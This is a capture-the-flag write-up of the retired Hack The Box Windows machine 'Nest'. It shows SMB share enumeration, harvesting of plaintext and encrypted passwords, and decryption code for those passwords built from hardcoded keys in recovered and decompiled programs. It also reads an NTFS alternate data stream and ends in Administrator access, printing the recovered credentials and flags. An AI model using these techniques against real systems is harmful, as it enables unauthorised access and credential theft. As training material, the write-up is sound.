Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Machine info

Nest [by VbScrub]
IP: 10.10.10.178
OS: Windows
Difficulty: Easy
Release: 25 Jan 2020
Retired: 6 June 2020

Recon

Nmap

As usual we kick off with a nmap scan of the box

$ nmap -v -sV -sC -oA scans/nmap_nest -Pn 10.10.10.178

PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 3m33s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-10T18:35:02
|_  start_date: 2020-05-10T15:53:15

4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=5/10%Time=5EB84977%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");

SMB

Since we see SMB is available (tcp/445), we perform a scan of the available shares.

$ sudo smbclient -L 10.10.10.178
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

There seem to be a few shares available.

Digging around, we find a file containing maintenance alerts.
Perhaps we can find some info here on fixes that need to happen on this box?

The file is located a \Data\Shared\Maintenance\Maintance Alerts.txt.

smbclient -N \\\\10.10.10.178\\Data
smb: \> cd Shared
smb: \Shared\> ls
  .                                   D        0  Wed Aug  7 21:07:51 2019
  ..                                  D        0  Wed Aug  7 21:07:51 2019
  Maintenance                         D        0  Wed Aug  7 21:07:32 2019
  Templates                           D        0  Wed Aug  7 21:08:07 2019
                10485247 blocks of size 4096. 6545663 blocks available
smb: \Shared\> cd Maintenance
smb: \Shared\Maintenance\> ls
  .                                   D        0  Wed Aug  7 21:07:32 2019
  ..                                  D        0  Wed Aug  7 21:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 01:01:44 2019
                10485247 blocks of size 4096. 6545663 blocks available
smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0,5 KiloBytes/sec) (average 0,5 KiloBytes/sec)
$ cat Maintenance\ Alerts.txt 
There is currently no scheduled maintenance work

Sadly, nothing of interest here.

Digging further, we find a template for a welcome email.
Perhaps this contains some info on getting access to the network/box?

This one is found at \Data\Shared\Templates\HR\Welcome Email.txt.

$ cat Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR

Here we find the path of the home directory for new employees/users.
But more importantly, we find a username and a password!
Also, we now have the hostname of the box.

Having a look at the Users share we find a few usernames, including TempUser.

$ smbclient -N \\\\10.10.10.178\\Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019
                10485247 blocks of size 4096. 6545663 blocks available

Foothold

Testing our new creds

Using the newly acquired credentials, we have a look in the file shares again.

The home directory of our TempUser contains a “New Text Document”.
Perhaps this contains some interesting info?

\Users\TempUser\New Text Document.txt

$ smbclient -U TempUser \\\\10.10.10.178\\Users
smb: \TempUser\> get "New Text Document.txt"
getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)

$ cat New\ Text\ Document.txt

Sadly, it appears to be empty.

Config files

Looking further, we find some configuration files for NotepadPlusPlus and something called “RU Scanner”.
Configuration files often hold credentials or references to interesting locations.

The Notepad++ configuration file can be found at \IT\Configs\NotepadPlusPlus\config.xml. The config file for RU Scanner is located at \IT\Configs\RU Scanner\RU_config.xml.

An easy way to recon folders on SMB is to do a recursive ls.

$ smbclient -U TempUser \\\\10.10.10.178\\Data
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

\IT
  .                                   D        0  Thu Aug  8 00:58:07 2019
  ..                                  D        0  Thu Aug  8 00:58:07 2019
  Archive                             D        0  Tue Aug  6 00:33:58 2019
  Configs                             D        0  Thu Aug  8 00:59:34 2019
  Installs                            D        0  Thu Aug  8 00:08:30 2019
  Reports                             D        0  Sun Jan 26 01:09:13 2020
  Tools                               D        0  Tue Aug  6 00:33:43 2019

[... cut for brevity ...]

\IT\Configs
  .                                   D        0  Thu Aug  8 00:59:34 2019
  ..                                  D        0  Thu Aug  8 00:59:34 2019
  Adobe                               D        0  Wed Aug  7 21:20:09 2019
  Atlas                               D        0  Tue Aug  6 13:16:18 2019
  DLink                               D        0  Tue Aug  6 15:25:27 2019
  Microsoft                           D        0  Wed Aug  7 21:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 21:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 22:01:13 2019
  Server Manager                      D        0  Tue Aug  6 15:25:19 2019

[... cut for brevity ...]

\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 21:31:37 2019
  ..                                  D        0  Wed Aug  7 21:31:37 2019
  config.xml                          A     6451  Thu Aug  8 01:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 21:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 22:01:13 2019
  ..                                  D        0  Wed Aug  7 22:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 21:49:37 2019

[... cut for brevity ...]

Looking at RU_config.xml we find the following info:

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

We see a password here that seems to contain base64 encoded data (notice the = at the end).
However, trying to decode this gives us no useable output. There must be some extra encoding or encryption going on here.

The config.xml of Notepad++ contains the following interesting info in the file history section.

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
    <File filename="C:\windows\System32\drivers\etc\hosts" />
    <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
    <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>

Secure

Still using the credentials of the TempUser, we have a look at the Secure share.

Using the same technique of recursive file listing, we find some interesting files.

$ smbclient -U TempUser \\\\10.10.10.178\\Secure$
Unable to initialize messaging context
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 01:08:12 2019
  ..                                  D        0  Thu Aug  8 01:08:12 2019
  Finance                             D        0  Wed Aug  7 21:40:13 2019
  HR                                  D        0  Thu Aug  8 01:08:11 2019
  IT                                  D        0  Thu Aug  8 12:59:25 2019

[... cut for brevity ...]

\IT\Carl\VB Projects\WIP
  .                                   D        0  Tue Aug  6 16:47:41 2019
  ..                                  D        0  Tue Aug  6 16:47:41 2019
  RU                                  D        0  Fri Aug  9 17:36:45 2019

\IT\Carl\VB Projects\WIP\RU
  .                                   D        0  Fri Aug  9 17:36:45 2019
  ..                                  D        0  Fri Aug  9 17:36:45 2019
  RUScanner                           D        0  Thu Aug  8 00:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 16:45:36 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner
  .                                   D        0  Thu Aug  8 00:05:54 2019
  ..                                  D        0  Thu Aug  8 00:05:54 2019
  bin                                 D        0  Wed Aug  7 22:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 00:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 00:05:44 2019
  My Project                          D        0  Wed Aug  7 22:00:11 2019
  obj                                 D        0  Wed Aug  7 22:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 17:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 14:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 00:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 21:49:35 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
  .                                   D        0  Wed Aug  7 22:00:11 2019
  ..                                  D        0  Wed Aug  7 22:00:11 2019
  Debug                               D        0  Wed Aug  7 21:59:13 2019
  Release                             D        0  Tue Aug  6 14:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
  .                                   D        0  Wed Aug  7 22:00:11 2019
  ..                                  D        0  Wed Aug  7 22:00:11 2019
  Application.Designer.vb             A      441  Tue Aug  6 14:55:13 2019
  Application.myapp                   A      481  Tue Aug  6 14:55:13 2019
  AssemblyInfo.vb                     A     1163  Tue Aug  6 14:55:13 2019
  Resources.Designer.vb               A     2776  Tue Aug  6 14:55:13 2019
  Resources.resx                      A     5612  Tue Aug  6 14:55:13 2019
  Settings.Designer.vb                A     2989  Tue Aug  6 14:55:13 2019
  Settings.settings                   A      279  Tue Aug  6 14:55:13 2019

[... cut for brevity ...]

It looks like Carl is working on a Visual Basic project named RU Scanner.

Programming in VB

We copy this whole directory structure locally so that we can have a look at the source code.
Perhaps we find what we need to decode the password we found in the config file?

$ smbget -rR "smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU" -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/ConfigFile.vb                            
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/Module1.vb                               
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb       
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Application.myapp             
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb               
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb         
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Resources.resx                
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb          
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/My Project/Settings.settings             
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj                        
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user                   
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/SsoIntegration.vb                        
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner/Utils.vb                                 
smb://10.10.10.178/Secure$/IT/Carl/VB Projects/WIP/RU/RUScanner.sln                                      
Downloaded 25,05kB in 7 seconds

You can open the .vb files one by one in a text editor or use an IDE like Visual Code to have a look at the source code.

Eventually, we discover that RUScanner/Utils.vb contains the logic for encrypting and decrypthing passwords.

Public Shared Function DecryptString(EncryptedString As String) As String
    [...]
    Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)

Public Shared Function Decrypt(ByVal cipherText As String, _
        ByVal passPhrase As String, _
        ByVal saltValue As String, _
        ByVal passwordIterations As Integer, _
        ByVal initVector As String, _
        ByVal keySize As Integer) _
    As String
    [...]

We can simply copy this code and run it against the encrypted password we found in the config file.

Imports System.Text
Imports System.Security.Cryptography


Public Class Utils

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
                cipherTextBytes = System.Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

                Dim memoryStream As System.IO.MemoryStream
                memoryStream = New System.IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

        Sub Main()
                System.Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
        End Sub
End Class

We can use an online too like dotnetfiddle.net to run our code.

This gives us the password xRxRxPANCAK3SxRxRx

Agent Smith

Since this project was written by the user c.smith, we use this password to login as him/her on the box.

$ smbclient -U c.smith \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\c.smith's password: # xRxRxPANCAK3SxRxRx
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

\C.Smith
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

[...]

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 14:18:42 2019
  ..                                  D        0  Fri Aug  9 14:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 01:41:16 2019

We find the user flag in C.Smith’s home directory.

smb: \> cd C.Smith\                                                                                      
smb: \C.Smith\> get user.txt        
getting file \C.Smith\user.txt of size 32 as user.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)

$ cat user.txt 
cf71b25404be5d84fd827e05f426e987

Privesc

Alternate Data Streams

The Debug Mode Password.txt file looks interesting, but appears to be empty again.

smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt" 
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt of size 0 as Debug Mode Password.txt (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)

However, this box was specifically built on Windows and rumour is its creator has hidden something using a technique specifically for Windows and NTFS: Alternate Data Strams (ADS).

Looking at the Debug Mode Password.txt file again in more detail, we find something interesting.

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    vr aug  9 01:06:12 2019 CEST
access_time:    vr aug  9 01:06:12 2019 CEST
write_time:     vr aug  9 01:08:17 2019 CEST
change_time:    vr aug  9 01:08:17 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$DATA"
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password:$DATA of size 15 as Debug Mode Password.txt:Password:$DATA (0,1 KiloBytes/sec) (average 0,9 KiloBytes/sec)

$ cat Debug\ Mode\ Password.txt\:Password\:\$DATA 
WBQ201953D8w

Note that you need to specifically add the stream to path using the smb get command, otherwise you’ll just download the empty ::$DATA stream.

HQK Reporting

This debug password is linked to the HQK Reporting tool.
Looking back at the output of our nmap scan, we had an unknown service running on port 4386 and it’s banner mentioned HQK Reporting Service.

Since we’re working with a Windows box, we use telnet to connect to this service.

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

Current Directory: ALL QUERIES

We have successfully enabled the DEBUG mode and have been given additional commands to use.

Testing the commands available to us, we discover that LIST isn’t specifically listing reports but also directory listings.
We use this info to navigate around on the box, specifically the folder containing the HQK service and its config files.

>SETDIR ..

Current directory set to HQK
>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

>SETDIR LDAP

Current directory set to LDAP
>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

>SHOWQUERY 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

We again find a password that appears to be encrypted/encoded.
Also, we discover that the tool appears to be making some kind of LDAP connection in the WBQ Users.Production Organizational Unit of the domain nest.local.

ILSpy

Taking a step back and returning to our SMB access, we download the HqkLdap.exe executable.

Similar to how we got the previous password decoded, we could try to find the encoding/decoding section of this executable to try and decrypt the password we found.
However, this time we don’t have the source code, so we’ll need to reverse engineer the executable.

That’s where ILSpy comes in.
You can install this add-on in Visual Studio Code (a free IDE similar to Visual Studio) via the Marketplace.

Once you’ve installed the add-on, press Ctrl + Shift + P, select ILSpy: Decompile IM Assembly (pick file) and open HqkLdap.exe.

ILSpy

In here, we find the encryption module in /HqkLdap/CR.
We again extract this code and write our own script that will decode our password.
dotnetfiddle.net again comes to the rescue for executing our code.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
	public class CR
	{
		private const string K = "667912";
		private const string I = "1L1SA61493DRV53Z";
		private const string SA = "1313Rf99";

		public static string DS(string EncryptedString)
		{
			if (string.IsNullOrEmpty(EncryptedString))
			{
				return string.Empty;
			}
			return RD(EncryptedString, K, SA, 3, I, 256);
		}

		private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
		{
			byte[] bytes = Encoding.ASCII.GetBytes(initVector);
			byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
			byte[] array = Convert.FromBase64String(cipherText);
			Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
			checked
			{
				byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
				AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
				aesCryptoServiceProvider.Mode = CipherMode.CBC;
				ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes);
				MemoryStream memoryStream = new MemoryStream(array);
				CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
				byte[] array2 = new byte[array.Length + 1];
				int count = cryptoStream.Read(array2, 0, array2.Length);
				memoryStream.Close();
				cryptoStream.Close();
				return Encoding.ASCII.GetString(array2, 0, count);
			}
		}
		
		public void Main() {
			string encrypted = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=";
			System.Console.WriteLine("encrypted: " + encrypted);
			System.Console.WriteLine("decrypted: " + DS(encrypted));
		}
	}
}

Running our tool we get:

encrypted: yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
decrypted: XtH4nkS4Pl4y1nGX

Getting the root flag

We use this password to login as the Administrator user and find the root flag in it’s Desktop folder.

$ smbclient -U Administrator \\\\10.10.10.178\\C$
Unable to initialize messaging context
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

		10485247 blocks of size 4096. 6545151 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)

$ cat root.txt 
6594c2eb084bc0f08a42f0b94b878c41

:)